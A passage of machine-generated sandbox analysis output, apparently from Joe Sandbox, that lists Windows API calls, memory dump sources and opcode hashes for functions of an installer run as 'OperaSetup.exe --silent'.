                                                                                                                                                                            • Opcode ID: c45f180bea824e86b9f60da59515b64d79646989f9db2e08603b41b576f742c4
                                                                                                                                                                            • Instruction ID: 678fb2cce29b027916b6e9c77d741f72fc3b9667aac1924bad6fa13dfa27649e
                                                                                                                                                                            • Opcode Fuzzy Hash: c45f180bea824e86b9f60da59515b64d79646989f9db2e08603b41b576f742c4
                                                                                                                                                                            • Instruction Fuzzy Hash: E6E0BFB4500209BFFB009B64ED49F7B7B7CE704605F008525BD10F2191D774D8159A7D
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,00403775,0000000C,?,?,?,?,?,?,?,?), ref: 00406AA8
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406AC3
                                                                                                                                                                              • Part of subcall function 00406A26: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A3D
                                                                                                                                                                              • Part of subcall function 00406A26: wsprintfW.USER32 ref: 00406A78
                                                                                                                                                                              • Part of subcall function 00406A26: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A8C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2547128583-0
                                                                                                                                                                            • Opcode ID: 09a5520475afffee645b4664441d986c1138b09cf986c3d6b2a713b3520f987f
                                                                                                                                                                            • Instruction ID: 6883b19bcb958afdb132cd43d0a9aeb12fc85c99e1cf53eaa24744f9dd55f8c1
                                                                                                                                                                            • Opcode Fuzzy Hash: 09a5520475afffee645b4664441d986c1138b09cf986c3d6b2a713b3520f987f
                                                                                                                                                                            • Instruction Fuzzy Hash: CDE08636714611ABD210BA745E48C6777A89F86610306C83EF542F2141D734DC33AA79
                                                                                                                                                                            APIs
                                                                                                                                                                            • FreeLibrary.KERNEL32(?,74DF3420,00000000,74DF2EE0,00403CB6,004D1000,00403BB5,?,?,00000008,0000000A,0000000C), ref: 00403CF9
                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00403D00
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Free$GlobalLibrary
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1100898210-0
                                                                                                                                                                            • Opcode ID: e95d17bfaf349d732f0976dec1ca20856772db7d244860fdb52b783a83313983
                                                                                                                                                                            • Instruction ID: 6cc7235c82e409e594193dc40a4abc0356c386f753d5776fe34d96f63476a0b8
                                                                                                                                                                            • Opcode Fuzzy Hash: e95d17bfaf349d732f0976dec1ca20856772db7d244860fdb52b783a83313983
                                                                                                                                                                            • Instruction Fuzzy Hash: 2DE012334151305BD6225F59FE0575ABB68BF45F22F05C52FE940BB2A18BB85C424FD8
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetFileAttributesW.KERNEL32(00000003,00403138,004D9000,80000000,00000003), ref: 00406196
                                                                                                                                                                            • CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 004061B8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$AttributesCreate
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 415043291-0
                                                                                                                                                                            • Opcode ID: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
                                                                                                                                                                            • Instruction ID: be52236ca1bfc2e7009fe271a1dfd41440a2a0d1ebc26b2cb4c8630358080456
                                                                                                                                                                            • Opcode Fuzzy Hash: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
                                                                                                                                                                            • Instruction Fuzzy Hash: 30D09E31254301EFFF098F20DE16F2EBAA2EB94B00F11952CB682941E0DA715819DB15
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?,?,00405D72,?,?,00000000,00405F48,?,?,?,?), ref: 00406172
                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406186
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                            • Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                                                                                                                            • Instruction ID: 83b49fe15d4d51a1c27b4b8da2ab4689423c6710ab607d501633f61f971848cf
                                                                                                                                                                            • Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                                                                                                                            • Instruction Fuzzy Hash: 63D0C972504220BFC2102728AE0889BBB55DB552717028A35FCA9A22B0CB314C6A86A4
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000,00403658,004D1000,004D1000,004D1000,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 00405C56
                                                                                                                                                                            • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405C64
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1375471231-0
                                                                                                                                                                            • Opcode ID: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
                                                                                                                                                                            • Instruction ID: 868687b2a80a8d4cb6d5034857ca3092976d2c25b2f3b55ea206b3a8d14aaeda
                                                                                                                                                                            • Opcode Fuzzy Hash: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
                                                                                                                                                                            • Instruction Fuzzy Hash: C7C04C30608701DAEA105B31DE8CB177A50BB54741F198439A582F41B0DA348555D92D
                                                                                                                                                                            APIs
                                                                                                                                                                            • CloseHandle.KERNEL32(FFFFFFFF,004D1000,00403BB5,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403C94
                                                                                                                                                                            • CloseHandle.KERNEL32(FFFFFFFF,004D1000,00403BB5,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403CA8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                                                            • Opcode ID: d2bdcc80eca201cd5359b13114e9f273fde289d40d32cb5243316b7ba4aee94e
                                                                                                                                                                            • Instruction ID: 93454ec2f84d486dd0eb46c633a3a61ffb1fb8fcaaff07e214acfe86ea83ea04
                                                                                                                                                                            • Opcode Fuzzy Hash: d2bdcc80eca201cd5359b13114e9f273fde289d40d32cb5243316b7ba4aee94e
                                                                                                                                                                            • Instruction Fuzzy Hash: 33E0863150471496D5206F7CAE4D9853B185F41335765C327F038F21F0C738D95A5AAD
                                                                                                                                                                            APIs
                                                                                                                                                                            • WriteFile.KERNEL32(00008001,00000000,00000000,00000000,00000000,0042158D,0041E6F0,0040359E,0041E6F0,0042158D,004266F0,00004000,?,00000000,004033C8,00000004), ref: 00406258
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileWrite
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3934441357-0
                                                                                                                                                                            • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                                                                                                            • Instruction ID: 50ccb5e768420c5b79bdfebb9096a84dabe54a6ff5c0a4120d9a71b85527c923
                                                                                                                                                                            • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                                                                                                            • Instruction Fuzzy Hash: FDE08C3221821AABCF10BE608C00EEB3B6CEB017A0F02447AFD56E3050D231E83097A8
                                                                                                                                                                            APIs
                                                                                                                                                                            • ReadFile.KERNEL32(00008001,00000000,00000000,00000000,00000000,004266F0,0041E6F0,0040361A,00008001,00008001,0040351E,004266F0,00004000,?,00000000,004033C8), ref: 00406229
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                                            • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                                                                                                            • Instruction ID: fbac330590941eb325162a4ee9bfa4b3c7313c609e27a1dd4f64d068a4d06545
                                                                                                                                                                            • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                                                                                                            • Instruction Fuzzy Hash: 8FE08632110129ABCF106E549C00EEB375CEF05350F014876F951E3040D730E83187A5
                                                                                                                                                                            APIs
                                                                                                                                                                            • RegOpenKeyExW.KERNEL32(00000000,0043A728,00000000,00000000,?,?,00000000,?,0040659D,?,0043A728,?,?,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,?,00000000), ref: 00406533
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Open
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 71445658-0
                                                                                                                                                                            • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                                                                                                                            • Instruction ID: f918e5a98cb24a054262289ed7dc727aaea68e18f53d3a7cb50250e03803467c
                                                                                                                                                                            • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                                                                                                                            • Instruction Fuzzy Hash: 49D0127200020DBBDF119E90AD01FAB3B1DEB08750F014826FE06A4090D775D530A759
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,0040331B,?), ref: 0040362B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FilePointer
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 973152223-0
                                                                                                                                                                            • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                                                                                                            • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                                                                                                                                            • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                                                                                                            • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00405727: lstrlenW.KERNEL32(0043A728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                                                                                                                                              • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,0043A728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                                                                                                                                              • Part of subcall function 00405727: lstrcatW.KERNEL32(0043A728,004030CD,004030CD,0043A728,00000000,00000000,00000000), ref: 00405782
                                                                                                                                                                              • Part of subcall function 00405727: SetWindowTextW.USER32(0043A728,0043A728), ref: 00405794
                                                                                                                                                                              • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                                                                                                                                              • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                                                                                                                                              • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                                                                                                                                              • Part of subcall function 00405C85: CreateProcessW.KERNEL32(00000000,00481000,00000000,00000000,00000000,04000000,00000000,00000000,0045A750,?,?,?,00481000,?), ref: 00405CAE
                                                                                                                                                                              • Part of subcall function 00405C85: CloseHandle.KERNEL32(?,?,?,00481000,?), ref: 00405CBB
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00402010
                                                                                                                                                                              • Part of subcall function 00406B41: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406B52
                                                                                                                                                                              • Part of subcall function 00406B41: GetExitCodeProcess.KERNEL32(?,?), ref: 00406B74
                                                                                                                                                                              • Part of subcall function 004065E9: wsprintfW.USER32 ref: 004065F6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2972824698-0
                                                                                                                                                                            • Opcode ID: c37c337817e1dfb9061d04ab007e7fa4af6351da24787f6127d7a9909fa94f94
                                                                                                                                                                            • Instruction ID: 39264c5466c0a9c1499aa9251a9428ad8f628c8ba18ccf0a3388d06020594a91
                                                                                                                                                                            • Opcode Fuzzy Hash: c37c337817e1dfb9061d04ab007e7fa4af6351da24787f6127d7a9909fa94f94
                                                                                                                                                                            • Instruction Fuzzy Hash: ABF0FC31904111DBEB20BBA55AC94AE7260CF00318F10413FE202B21D5CABC4D41A65E
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDlgItem.USER32(?,00000403), ref: 004058C4
                                                                                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004058D3
                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00405910
                                                                                                                                                                            • GetSystemMetrics.USER32(00000002), ref: 00405917
                                                                                                                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405938
                                                                                                                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405949
                                                                                                                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040595C
                                                                                                                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040596A
                                                                                                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040597D
                                                                                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040599F
                                                                                                                                                                            • ShowWindow.USER32(?,00000008), ref: 004059B3
                                                                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004059D4
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004059E4
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059FD
                                                                                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405A09
                                                                                                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 004058E2
                                                                                                                                                                              • Part of subcall function 00404656: SendMessageW.USER32(00000028,?,00000001,00404481), ref: 00404664
                                                                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405A26
                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000057FA,00000000), ref: 00405A34
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00405A3B
                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00405A5F
                                                                                                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405A64
                                                                                                                                                                            • ShowWindow.USER32(00000008), ref: 00405AAE
                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405AE2
                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 00405AF3
                                                                                                                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405B07
                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00405B27
                                                                                                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405B40
                                                                                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B78
                                                                                                                                                                            • OpenClipboard.USER32(00000000), ref: 00405B88
                                                                                                                                                                            • EmptyClipboard.USER32 ref: 00405B8E
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B9A
                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00405BA4
                                                                                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405BB8
                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405BD8
                                                                                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405BE3
                                                                                                                                                                            • CloseClipboard.USER32 ref: 00405BE9
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
